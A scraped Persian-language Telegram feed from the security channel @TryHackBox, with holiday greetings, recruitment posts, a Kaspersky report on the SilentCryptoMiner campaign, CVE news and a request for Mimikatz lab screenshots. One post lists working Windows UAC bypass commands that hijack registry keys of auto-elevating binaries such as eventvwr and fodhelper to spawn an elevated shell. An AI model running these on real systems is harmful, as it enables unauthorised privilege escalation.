Try Hack Box - آمار و تحلیل کانال تلگرام @tryhackbox

6 215

🎊 پیشاپیش نوروز یادگار پرارج نیاکان ، شراره ی فروزان فرهنگ ایران‌زمین، نشانی ز روزگاران یگانگی و سرفرازی ایرانیان بر شما پرسرور باد. 🎉 @TryHackBox

6 215

نوروز یادگار پرارج نیاکان ، شراره ی فروزان فرهنگ ایران‌زمین، نشانی ز روزگاران یگانگی و سرفرازی ایرانیان بر شما پرسرور باد.

6 215

دوستان ما قصد داریم سایت خود را بالا بیاوریم اگر مایل بود در طراحی و فرانت و بک اند سایت کمک کنید میتوانید پیام بدید : @Delaram_Najafii

6 215

⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️ 💠 تست نفوذ را رایگان یاد بگیر . ⭕️ @TryHackBox 📖 کتاب ها و منابع Cyber Security 📚 @LibrarySecOfficial 💠 رودمپ های مختلف از جمله ردتیم بلوتیم تست نفوذ و ... ⭕️ @TryHackBoxOfficial 💠 منابع BlueTeam : ⭕️ @BlueTeamKit 💠 ابزارها و دوره های OSINT ⭕️ @OsintGit 💠 برگزاری دوره های امنیت سایبری ⭕️ @kasraone_com 💠 تمامی منابع Red Team اینجاست! 💠 آموزش توسعه بدافزار (رایگان) ⭕️ @RedTeamVillageRTV 💠 منابع CTF و رایت آپ ها و دوره های HackTheBox : ⭕️ @PfkCTF 🐍 مینی آموزش های امنیت : 🪽 @qp_learn 💠 دوره های آموزشی - CVE-Exploit ⭕️ @HackTheBox_Academy 💠 تست نفوذ وب ⭕️ @GitBook_s 💠 برای اضافه شدن در لیست پیام دهید : 🤖 @Delaram_Najafii ⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️

6 215

دوستان به زودی عیدی ما در دسترس شما عزیزان قرار خواهد گرفت ...

6 215

حال و هواتون عوض شه دوستان

6 215

4shanbe sori.mp33.14 MB

6 215

جشن چارشنبه سوری خجسته باد سیاوش چنین گفت با شهریار، که: «دوزخ مرا زین سخن گشت خوار! اگر کوهِ آتش بُوَد، بسپْرم. از این، تنگِ خوار است اگر، بگذرم. مگر آتشِ تیز، پیدا کند گنه کرده را زود رسوا کند! چو بخشایشِ پاکْ یزدان بُوَد دَمِ آتش و آب یکسان بُوَد!»

6 215

دوستانی که در حوزه SOC و Forensic کار میکنند میتوانند پیام دهند برای تدریس یا فرستادن مقاله و موارد دیگر

6 215

دوستانی که در حوزه SOC و Forensic کار میکنند میتوانند پیام دهند برای تدریس یا فرستادن مقاله و موارد دیگر

6 215

📌 به خانواده TryHackBox بپیوندید! 💢 ما در TryHackBox به دنبال افراد پرانرژی، خلاق و متخصص هستیم تا در تیم‌های مختلف ما عضو شوند. اگر به حوزه ردتیم و بلوتیم و تست نفوذ و موارد دیگر علاقه‌مندید و می‌خواهید در یک تیم پویا و حرفه‌ای فعالیت کنید، این فرصت را از دست ندهید! 💢 ۱. عضویت در تیم مدرسین ما آیا به آموزش و انتقال دانش علاقه‌مندید؟ به تیم مدرسین ما بپیوندید و در تولید دوره‌های آموزشی جذاب و کاربردی مشارکت کنید. 💢 ۲. عضویت در تیم ترجمه ما اگر به زبان انگلیسی مسلط هستید و به ترجمه مقالات تخصصی علاقه دارید، تیم ترجمه ما منتظر شماست تا دانش امنیت را به زبان فارسی در دسترس همه قرار دهیم. 💢 ۳. عضویت در تیم ابزارنویسی ما آیا به توسعه ابزارهای امنیتی و تست نفوذ علاقه‌مندید؟ به تیم ابزارنویسی ما بپیوندید و در ساخت ابزارهای نوآورانه مشارکت کنید. 💢 ۴. عضویت در تیم پادکست‌های ما عاشق روایت داستان‌ها و تولید محتوای صوتی هستید؟ به تیم پادکست‌های ما بپیوندید و داستان‌های جذاب امنیت سایبری را روایت کنید. 📍نیاز فوری: به یک یا دو نفر تدوین‌گر حرفه‌ای نیز نیازمندیم! 🧩 چرا به ما بپیوندید؟ - در یک تیم حرفه‌ای و پویا فعالیت کنید. - مهارت‌های خود را ارتقا دهید. - در تولید محتوای ارزشمند برای جامعه امنیت سایبری نقش داشته باشید. 👩‍💻 همین حالا به ما پیام دهید و به خانواده TryHackBox بپیوندید! 💠 شما میتوانید از طریق آیدی زیر به ما پیام دهید : @Delaram_Najafii

6 215

📌 به خانواده TryHackBox بپیوندید! 💢 ما در TryHackBox به دنبال افراد پرانرژی، خلاق و متخصص هستیم تا در تیم‌های مختلف ما عضو شوند. اگر به حوزه ردتیم و بلوتیم و تست نفوذ و موارد دیگر علاقه‌مندید و می‌خواهید در یک تیم پویا و حرفه‌ای فعالیت کنید، این فرصت را از دست ندهید! 💢 ۱. عضویت در تیم مدرسین ما آیا به آموزش و انتقال دانش علاقه‌مندید؟ به تیم مدرسین ما بپیوندید و در تولید دوره‌های آموزشی جذاب و کاربردی مشارکت کنید. 💢 ۲. عضویت در تیم ترجمه ما اگر به زبان انگلیسی مسلط هستید و به ترجمه مقالات تخصصی علاقه دارید، تیم ترجمه ما منتظر شماست تا دانش امنیت را به زبان فارسی در دسترس همه قرار دهیم. ۳. عضویت در تیم ابزارنویسی ما آیا به توسعه ابزارهای امنیتی و تست نفوذ علاقه‌مندید؟ به تیم ابزارنویسی ما بپیوندید و در ساخت ابزارهای نوآورانه مشارکت کنید. ۴. عضویت در تیم پادکست‌های ما عاشق روایت داستان‌ها و تولید محتوای صوتی هستید؟ به تیم پادکست‌های ما بپیوندید و داستان‌های جذاب امنیت سایبری را روایت کنید. نیاز فوری: به یک یا دو نفر تدوین‌گر حرفه‌ای نیز نیازمندیم! چرا به ما بپیوندید؟ - در یک تیم حرفه‌ای و پویا فعالیت کنید. - مهارت‌های خود را ارتقا دهید. - در تولید محتوای ارزشمند برای جامعه امنیت سایبری نقش داشته باشید. همین حالا به ما پیام دهید و به خانواده TryHackBox بپیوندید! همراه ما باشید تا دنیای امنیت سایبری را متحول کنیم!

6 215

+1

🐧 برگه تقلب در مورد کار با Cron Utility و مجوزهای فایل در لینوکس : نکته ای برای هکر اخلاقی #cheatsheet #linux @TryHackBox

6 215

$🔓 UAC bypass oneliners eventvwr.exe reg add "HKCU\Software\Classes\mscfile\shell\open\command" /v DelegateExecute /t REG_SZ$

🔓 UAC bypass oneliners eventvwr.exe

reg add "HKCU\Software\Classes\mscfile\shell\open\command" /v DelegateExecute /t REG_SZ /d "" /f && reg add "HKCU\Software\Classes\mscfile\shell\open\command" /ve /t REG_SZ /d "cmd /c start cmd" /f && eventvwr.exe

fodhelper.exe

reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "cmd.exe" && start fodhelper.exe

sdclt.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe /ve /t REG_SZ /d "cmd.exe" /f && start sdclt.exe

slui.exe

reg add HKCU\Software\Classes\exefile\shell\open\command /ve /t REG_SZ /d "cmd.exe" /f && reg add HKCU\Software\Classes\exefile\shell\open\command /v DelegateExecute /f && start slui.exe

perfmon.exe

reg add "HKCU\Software\Classes\mscfile\shell\open\command" /v DelegateExecute /t REG_SZ /d "" /f && reg add "HKCU\Software\Classes\mscfile\shell\open\command" /ve /t REG_SZ /d "cmd /c start cmd" /f && start perfmon.exe

taskmgr.exe

reg add HKCU\Software\Classes\taskmgr\shell\open\command /ve /t REG_SZ /d "cmd.exe" /f && start taskmgr.exe

ComputerDefaults.exe

reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /ve /t REG_SZ /d "cmd.exe" /f && reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ /d "" /f && start computerdefaults.exe

sysprep.exe

reg add HKCU\Software\Classes\AppID\{921C1A8B-9F15-4DA4-9235-0472C3A216E6} /f /ve /t REG_SZ /d "cmd.exe" && start C:\Windows\System32\sysprep\sysprep.exe

control.exe

cmd /c reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /ve /d "cmd.exe" /f && control.exe /computername

Сброс:

reg delete "HKCU\Software\Classes\mscfile\shell\open\command" /f
reg delete "HKCU\Software\Classes\ms-settings\shell\open\command" /f
reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /f
reg delete "HKCU\Software\Classes\exefile\shell\open\command" /f
reg delete "HKCU\Software\Classes\taskmgr\shell\open\command" /f
reg delete "HKCU\Software\Classes\AppID{921C1A8B-9F15-4DA4-9235-0472C3A216E6}" /f

#uac #bypass #windows ✈️ Pentest HaT

6 215

خبرهای هیجان‌انگیزی در راه است! ما قصد داریم با افراد برجسته‌ حوزه امنیت سایبری، لایوهای جذاب و پرمحتوایی برگزار کنیم. شما می‌توانید سوالات خود را بپرسید و پاسخ‌های خود را از این کارشناسان دریافت کنید! اما برای اینکه این رویدادها به بهترین شکل ممکن برگزار شوند، به حمایت شما نیاز داریم. کانال یوتیوب ما به این دلیل که تازه راه اندازی شده تعداد کاربرانی که دنبال میکنند ما را کم هست تعداد افراد کانال تلگرام ما نزدیک به ۴ هزار نفر هست و هر کدومتون یه یوتیوب تو گوشی‌تون دارین یا می‌تونین به راحتی وارد سایت بشید ، پس لطفا ما را دنبال کنید! از شما خواهش می‌کنم با یک کلیک ساده، کانال یوتیوب را دنبال کنید.با اینکار ، ما یک قدم به برگزاری این لایوهای فوق‌العاده نزدیک‌تر می‌شویم. اجازه بدید با هم با این بزرگواران مصاحبه‌های جذابی داشته باشیم! با اینکار شما از جامعه آموزش رایگان حمایت میکنید تا آموزش های بیشتری در اختیارتون قرار گیرد . با تشکر از همگی شما! کانال یوتیوب ما : https://youtube.com/@tryhackbox

6 215

محققان آزمایشگاه کسپرسکی (Kaspersky Lab) یک کمپین مخرب جدید را فاش کرده‌اند که هدف آن کاربران یوتیوب است و از یک ماینر مخرب به نام SilentCryptoMiner تحت عنوان ابزارهای Windows Packet Divert (WPD) استفاده می‌کند. جزئیات حمله: ۱. تقلب در یوتیوب: تولیدکنندگان محتوای یوتیوب که درباره ابزارهای WPD آموزش می‌دهند، اغلب ویدیوهایی برای دور زدن محدودیت‌های وب‌سایت‌ها و سرویس‌های آنلاین منتشر می‌کنند. مهاجمان خود را به عنوان توسعه‌دهندگان این ابزارها جا زده و با ارسال ادعاهای جعلی نقض کپی‌رایت، سازندگان ویدیو را مجبور می‌کنند تا لینک‌های مخرب حاوی ماینرهای رمزارز را تبلیغ کنند. ۲. تهدید و فریب: مهاجمان با تهدید به حذف ویدیوها یا مسدود کردن کانال‌ها، از سازندگان می‌خواهند لینک‌های جدیدی را جایگزین کنند. در برخی موارد، مهاجمان مستقیماً با سازندگان تماس گرفته و ادعا می‌کنند نسخه جدیدی از ابزار منتشر شده و لینک قدیمی باید به‌روز شود. ۳. توزیع بدافزار: سازندگان که از مسدود شدن می‌ترسند، لینک‌های پیشنهادی را در ویدیوها قرار می‌دهند. این لینک‌ها به مخزن‌های GitHub اشاره می‌کنند که حاوی نسخه‌های جعلی WPD با لودر ماینر هستند. آمار و ارقام: یک ویدیو با بیش از ۴۰۰,۰۰۰ بازدید، این لینک مخرب را تبلیغ کرد که ۴۰,۰۰۰ بار دانلود شد. یک کانال تلگرام با ۳۴۰,۰۰۰ عضو نیز در تبلیغ این بدافزار مشارکت داشت. بر اساس داده‌های کسپرسکی، حداقل ۲,۰۰۰ قربانی در روسیه شناسایی شده‌اند، اما آمار واقعی احتمالاً بسیار بیشتر است. نحوه عملکرد بدافزار: ۱. فایل مخرب: فایل دانلودشده از GitHub حاوی یک لودر مبتنی بر پایتون است که با اسکریپت PowerShell (general.bat) اجرا می‌شود. اگر آنتی‌ویروس پروسس را متوقف کند، اسکریپت پیغام خطای «فایل یافت نشد» نشان داده و از کاربر می‌خواهد آنتی‌ویروس را غیرفعال کند. ۲. لودر مرحله دوم: این لودر فقط برای آیپی‌های روسیه فعال شده و فایلی اجرایی با حجم ۶۹۰ مگابایت دانلود می‌کند تا از شناسایی توسط آنتی‌ویروس جلوگیری کند. این فایل شامل بررسی محیط‌های مجازی (Sandbox) و ماشین‌های مجازی است. ۳. غیرفعال کردن دفاع‌ها: لودر، Microsoft Defender را با افزودن یک استثنا غیرفعال کرده و سرویس ویندوزی به نام DrvSvc ایجاد می‌کند تا پس از هر راه‌اندازی مجدد فعال بماند. ۴. ماینر رمزارز: بدافزار نهایی، SilentCryptoMiner، یک نسخه تغییر یافته از XMRig است که می‌تواند رمزارزهای ETH، ETC، XMR و RTM را استخراج کند. این ماینر هر ۱۰۰ دقیقه یک بار تنظیمات خود را از Pastebin دانلود می‌کند. برای پنهان‌سازی، فعالیت استخراج در پروسس سیستمی dwm.exe جاسازی شده و هنگام اجرای ابزارهایی مثل Process Explorer متوقف می‌شود. هدف حمله: این کمپین عمدتاً کاربران روسیه را هدف قرار داده، اما امکان گسترش آن برای توزیع بدافزارهای سرقت اطلاعات (Stealers) یا باج‌افزار (Ransomware) نیز وجود دارد. @TryHackBox

6 215

محققان آزمایشگاه کسپرسکی (Kaspersky Lab) یک کمپین مخرب جدید را فاش کرده‌اند که هدف آن کاربران یوتیوب است و از یک ماینر مخرب به نام SilentCryptoMiner تحت عنوان ابزارهای Windows Packet Divert (WPD) استفاده می‌کند. جزئیات حمله: ۱. تقلب در یوتیوب: تولیدکنندگان محتوای یوتیوب که درباره ابزارهای WPD آموزش می‌دهند، اغلب ویدیوهایی برای دور زدن محدودیت‌های وب‌سایت‌ها و سرویس‌های آنلاین منتشر می‌کنند. مهاجمان خود را به عنوان توسعه‌دهندگان این ابزارها جا زده و با ارسال ادعاهای جعلی نقض کپی‌رایت، سازندگان ویدیو را مجبور می‌کنند تا لینک‌های مخرب حاوی ماینرهای رمزارز را تبلیغ کنند. ۲. تهدید و فریب: مهاجمان با تهدید به حذف ویدیوها یا مسدود کردن کانال‌ها، از سازندگان می‌خواهند لینک‌های جدیدی را جایگزین کنند. در برخی موارد، مهاجمان مستقیماً با سازندگان تماس گرفته و ادعا می‌کنند نسخه جدیدی از ابزار منتشر شده و لینک قدیمی باید به‌روز شود. ۳. توزیع بدافزار: سازندگان که از مسدود شدن می‌ترسند، لینک‌های پیشنهادی را در ویدیوها قرار می‌دهند. این لینک‌ها به مخزن‌های GitHub اشاره می‌کنند که حاوی نسخه‌های جعلی WPD با لودر ماینر هستند. آمار و ارقام: یک ویدیو با بیش از ۴۰۰,۰۰۰ بازدید، این لینک مخرب را تبلیغ کرد که ۴۰,۰۰۰ بار دانلود شد. یک کانال تلگرام با ۳۴۰,۰۰۰ عضو نیز در تبلیغ این بدافزار مشارکت داشت. بر اساس داده‌های کسپرسکی، حداقل ۲,۰۰۰ قربانی در روسیه شناسایی شده‌اند، اما آمار واقعی احتمالاً بسیار بیشتر است. نحوه عملکرد بدافزار: ۱. فایل مخرب: فایل دانلودشده از GitHub حاوی یک لودر مبتنی بر پایتون است که با اسکریپت PowerShell (general.bat) اجرا می‌شود. اگر آنتی‌ویروس پروسس را متوقف کند، اسکریپت پیغام خطای «فایل یافت نشد» نشان داده و از کاربر می‌خواهد آنتی‌ویروس را غیرفعال کند. ۲. لودر مرحله دوم: این لودر فقط برای آیپی‌های روسیه فعال شده و فایلی اجرایی با حجم ۶۹۰ مگابایت دانلود می‌کند تا از شناسایی توسط آنتی‌ویروس جلوگیری کند. این فایل شامل بررسی محیط‌های مجازی (Sandbox) و ماشین‌های مجازی است. ۳. غیرفعال کردن دفاع‌ها: لودر، Microsoft Defender را با افزودن یک استثنا غیرفعال کرده و سرویس ویندوزی به نام DrvSvc ایجاد می‌کند تا پس از هر راه‌اندازی مجدد فعال بماند. ۴. ماینر رمزارز: بدافزار نهایی، SilentCryptoMiner، یک نسخه تغییر یافته از XMRig است که می‌تواند رمزارزهای ETH، ETC، XMR و RTM را استخراج کند. این ماینر هر ۱۰۰ دقیقه یک بار تنظیمات خود را از Pastebin دانلود می‌کند. برای پنهان‌سازی، فعالیت استخراج در پروسس سیستمی dwm.exe جاسازی شده و هنگام اجرای ابزارهایی مثل Process Explorer متوقف می‌شود. هدف حمله: این کمپین عمدتاً کاربران روسیه را هدف قرار داده، اما امکان گسترش آن برای توزیع بدافزارهای سرقت اطلاعات (Stealers) یا باج‌افزار (Ransomware) نیز وجود دارد. @TryHackBox

6 215

🧩 ما به اشتراک‌گذاری آسیب‌پذیری‌های پرطرفدار و تهدیدات مرتبط با آن‌ها ادامه می‌دهیم: ۱. گوگل جزئیات فنی درباره آسیب‌پذیری EntrySign (CVE-2024-56161) در سیستم بررسی امضای میکروکد AMD Zen را منتشر کرد. این آسیب‌پذیری به مهاجمان اجازه می‌دهد تا Firmware (نرم‌افزار داخلی) مخرب را نصب کنند. گوگل همچنین ابزاری به نام Zentool را منتشر کرده است که برای جیلبریک (دسترسی غیرمجاز) پردازنده‌های AMD استفاده می‌شود. ۲. محققان Assetnote یک آسیب‌پذیری در سیستم مدیریت محتوای Sitecore کشف کردند که می‌تواند منجر به اجرای کد از راه دور (Remote Code Execution) شود. این آسیب‌پذیری با شناسه CVE-2025-27218 ثبت شده است. ۳. توسعه‌دهندگان Jenkins یک به‌روزرسانی امنیتی منتشر کردند که چهار آسیب‌پذیری در هسته این پلتفرم را برطرف می‌کند. ۴. شرکت Elastic یک به‌روزرسانی امنیتی برای Kibana منتشر کرد. این به‌روزرسانی یک آسیب‌پذیری را برطرف می‌کند که می‌تواند منجر به اجرای کد دلخواه از طریق آپلود فایل‌های مخرب یا درخواست‌های HTTP دستکاری‌شده شود. ۵. یک گروه از محققان جزئیات یک نوع جدید از حمله الکترونیکی به اینورترهای (مبدل‌های) نصب‌شده در نیروگاه‌های خورشیدی را ارائه کردند. این حمله که ReThink نام دارد، می‌تواند به اینورترها آسیب فیزیکی وارد کند و عملکرد سیستم‌های خورشیدی را مختل کند. ۶. محققان SEC Consult جزئیات یک آسیب‌پذیری به نام "زیبای خفته" را فاش کردند که می‌تواند حسگر CrowdStrike Falcon را غیرفعال کند. SEC Consult این مشکل را در پایان سال ۲۰۲۳ به تامین‌کننده گزارش داد، اما تامین‌کننده بدون رفع مشکل، آن را به عنوان یک "خلاء در تشخیص" عنوان کرد. با این حال، این آسیب‌پذیری در سال ۲۰۲۵ برطرف شد و علیرغم سکوت تامین‌کننده، SEC Consult جزئیات آن را به صورت عمومی منتشر کرد. ۷. محققان SquareX یک افزونه پلی‌مورفیک (چندشکلی) برای کروم توسعه داده‌اند که می‌تواند هر افزونه نصب‌شده محلی را تقلید کند. این افزونه‌ها یک کپی دقیق از آیکون، پنجره‌های پاپ‌آپ HTML و پروسس های افزونه اصلی ایجاد می‌کنند و حتی ممکن است افزونه اصلی را موقتاً غیرفعال کنند. این کار باعث می‌شود قربانیان باور کنند که در حال وارد کردن اطلاعات ورود به یک افزونه واقعی هستند. #CVE @TryHackBox

6 215

ما به اشتراک‌گذاری آسیب‌پذیری‌های پرطرفدار و تهدیدات مرتبط با آن‌ها ادامه می‌دهیم: ۱. گوگل جزئیات فنی درباره آسیب‌پذیری EntrySign (CVE-2024-56161) در سیستم بررسی امضای میکروکد AMD Zen را منتشر کرد. این آسیب‌پذیری به مهاجمان اجازه می‌دهد تا Firmware (نرم‌افزار داخلی) مخرب را نصب کنند. گوگل همچنین ابزاری به نام Zentool را منتشر کرده است که برای جیلبریک (دسترسی غیرمجاز) پردازنده‌های AMD استفاده می‌شود. ۲. محققان Assetnote یک آسیب‌پذیری در سیستم مدیریت محتوای Sitecore کشف کردند که می‌تواند منجر به اجرای کد از راه دور (Remote Code Execution) شود. این آسیب‌پذیری با شناسه CVE-2025-27218 ثبت شده است. ۳. توسعه‌دهندگان Jenkins یک به‌روزرسانی امنیتی منتشر کردند که چهار آسیب‌پذیری در هسته این پلتفرم را برطرف می‌کند. ۴. شرکت Elastic یک به‌روزرسانی امنیتی برای Kibana منتشر کرد. این به‌روزرسانی یک آسیب‌پذیری را برطرف می‌کند که می‌تواند منجر به اجرای کد دلخواه از طریق آپلود فایل‌های مخرب یا درخواست‌های HTTP دستکاری‌شده شود. ۵. یک گروه از محققان جزئیات یک نوع جدید از حمله الکترونیکی به اینورترهای (مبدل‌های) نصب‌شده در نیروگاه‌های خورشیدی را ارائه کردند. این حمله که ReThink نام دارد، می‌تواند به اینورترها آسیب فیزیکی وارد کند و عملکرد سیستم‌های خورشیدی را مختل کند. ۶. محققان SEC Consult جزئیات یک آسیب‌پذیری به نام "زیبای خفته" را فاش کردند که می‌تواند حسگر CrowdStrike Falcon را غیرفعال کند. SEC Consult این مشکل را در پایان سال ۲۰۲۳ به تامین‌کننده گزارش داد، اما تامین‌کننده بدون رفع مشکل، آن را به عنوان یک "خلاء در تشخیص" عنوان کرد. با این حال، این آسیب‌پذیری در سال ۲۰۲۵ برطرف شد و علیرغم سکوت تامین‌کننده، SEC Consult جزئیات آن را به صورت عمومی منتشر کرد. ۷. محققان SquareX یک افزونه پلی‌مورفیک (چندشکلی) برای کروم توسعه داده‌اند که می‌تواند هر افزونه نصب‌شده محلی را تقلید کند. این افزونه‌ها یک کپی دقیق از آیکون، پنجره‌های پاپ‌آپ HTML و پروسس های افزونه اصلی ایجاد می‌کنند و حتی ممکن است افزونه اصلی را موقتاً غیرفعال کنند. این کار باعث می‌شود قربانیان باور کنند که در حال وارد کردن اطلاعات ورود به یک افزونه واقعی هستند. #CVE @TryHackBox

6 215

درود دوستان کسی اینجا لابراتور داره که روش اکتیودایرکتوری داشته باشه جاییم نیستم چندتا اسکرین شات از دستورات میمیکتز میخوام بهش دستورات بگم بزنه اسکرین شات بده جهت ارتباط : @Unique_exploitbot